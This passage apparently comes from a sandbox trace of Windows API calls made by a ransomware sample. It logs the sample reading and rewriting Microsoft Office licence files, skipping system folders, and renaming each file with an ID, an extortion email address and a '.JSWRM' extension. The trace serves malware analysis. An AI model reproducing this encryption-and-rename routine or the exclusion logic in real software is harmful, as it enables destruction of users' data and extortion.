dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.788] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11199) returned 1 [0104.789] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0104.789] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0104.791] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.791] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0104.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.791] CloseHandle (hObject=0x45c) returned 1 [0104.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0104.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0104.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0104.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0104.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0104.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0104.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.791] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription5-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription5-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription5-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0104.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0104.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0104.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.792] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5c791bb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5c791bb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5d11b2f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x67ad, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription5-ppd.xrm-ms", cAlternateFileName="O3057F~1.XRM")) returned 1 [0104.792] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ppd.xrm-ms", lpString2=".") returned 1 [0104.792] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ppd.xrm-ms", lpString2="..") returned 1 [0104.792] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ppd.xrm-ms", lpString2="...") returned 1 [0104.792] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ppd.xrm-ms", lpString2="windows") returned -1 [0104.793] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.793] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.793] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.793] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.793] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.793] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0104.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription5-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0104.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription5-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0104.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0104.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0104.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription5-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0104.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription5-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0104.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0104.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0104.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0104.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0104.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription5-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.794] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26541) returned 1 [0104.794] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x67a0) returned 0x24c1d0 [0104.794] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x67a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x67a0, lpOverlapped=0x0) returned 1 [0104.797] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.797] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x67a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x67a0, lpOverlapped=0x0) returned 1 [0104.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.797] CloseHandle (hObject=0x45c) returned 1 [0104.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0104.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0104.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0104.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0104.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0104.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0104.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.798] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription5-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription5-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription5-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0104.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0104.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0104.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.799] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5c52f59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5c52f59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5ceb8e3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d83, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_Subscription5-ul-oob.xrm-ms", cAlternateFileName="O3FD01~1.XRM")) returned 1 [0104.799] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.799] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.799] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.799] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.799] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.799] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.799] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.799] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.799] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.799] lstrcmpiW (lpString1="O365HomePremR_Subscription5-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0104.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription5-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0104.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription5-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0104.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0104.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0104.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription5-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0104.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_Subscription5-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_Subscription5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0104.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0104.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0104.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0104.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0104.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription5-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.800] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11651) returned 1 [0104.800] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0104.800] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0104.803] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.803] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0104.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.803] CloseHandle (hObject=0x45c) returned 1 [0104.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0104.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0104.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0104.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0104.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0104.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0104.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.803] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription5-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription5-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription5-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0104.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0104.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0104.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.804] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5c2ccf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5c2ccf4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5cc5650, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest1-pl.xrm-ms", cAlternateFileName="O35B7D~1.XRM")) returned 1 [0104.804] lstrcmpiW (lpString1="O365HomePremR_SubTest1-pl.xrm-ms", lpString2=".") returned 1 [0104.804] lstrcmpiW (lpString1="O365HomePremR_SubTest1-pl.xrm-ms", lpString2="..") returned 1 [0104.804] lstrcmpiW (lpString1="O365HomePremR_SubTest1-pl.xrm-ms", lpString2="...") returned 1 [0104.805] lstrcmpiW (lpString1="O365HomePremR_SubTest1-pl.xrm-ms", lpString2="windows") returned -1 [0104.805] lstrcmpiW (lpString1="O365HomePremR_SubTest1-pl.xrm-ms", lpString2="recovery") returned -1 [0104.805] lstrcmpiW (lpString1="O365HomePremR_SubTest1-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.805] lstrcmpiW (lpString1="O365HomePremR_SubTest1-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.805] lstrcmpiW (lpString1="O365HomePremR_SubTest1-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.805] lstrcmpiW (lpString1="O365HomePremR_SubTest1-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.805] lstrcmpiW (lpString1="O365HomePremR_SubTest1-pl.xrm-ms", lpString2="msocache") returned 1 [0104.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0104.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest1-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest1-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0104.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0104.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest1-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest1-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0104.805] RtlAllocateHeap (HeapHandle=0x1e0000, 